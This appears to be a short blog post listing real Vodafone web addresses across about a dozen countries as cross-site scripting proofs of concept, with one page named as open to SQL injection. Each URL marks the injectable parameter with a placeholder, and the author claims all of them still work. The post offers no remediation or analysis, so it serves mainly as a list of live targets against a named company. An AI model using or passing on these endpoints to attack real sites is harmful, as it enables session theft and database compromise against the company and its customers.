Vodafone.com , Vodafone.ro , Vodafone.com.tr , Vodafone.com.au , Vodafone.es , Vodafone.it , Vodafone.gr , Vodafone.ie , Vodafone.in , Vodafone.de , Vodafone.co.uk
Proof of concept:
https://www.vodafone.ro/mydomain/shop/voda.signup.cgi?pageid=print_moreinfo&id=XSS
http://runners.vodafone.com/wp-content/plugins/post-star-rating/psr-ajax-stars.php?p=XSS
https://wlan.net.vodafone.it/vfile/pwlan/pages/otp/login_partner.jsp?LoginURL=login.linkem.com/sd/login&AccessLocation=isocc=it,cc=39,ac=06,network=linkem&LogoffURL=x&LocationName=XSS
https://club2020.mi.vodafone.es/rascaygana/mailing/mail_alta.php?telefono_encriptado=XSS
http://handyfinder.vodafone.de/application_start.php?RTYPE=XSS
http://portal.vodafone.gr/vodafonenet/register/newRegister/holSSOlogin.jsp?action2=XSS
http://live.vodafone.com.tr/galleryimages/watch.php?url=http://live.vodafone.com.tr/galleryimages/rockncoke/videos/rnc_video_03.flv&keepThis=true&TB_iframe=true&height=XSS
http://vic.vodafone.com.au/coverage/qld.asp?detail=58XSS
http://www.vodafone.ie/search/Search.shtml?site=10_163_142_helpsupport&q=XSS
http://promo.in.vodafone.in/admin/index.php?Page=XSS
And SQL Injection on http://mediacentre.vodafone.co.uk
Poc:
http://mediacentre.vodafone.co.uk/news_view_doc.php?type=press&doc_id=SQL Injection
xss works also!
All proof of concept still works,Be careful !
No response to “Several Vodafone sites vulnerable to XSS”
Leave a reply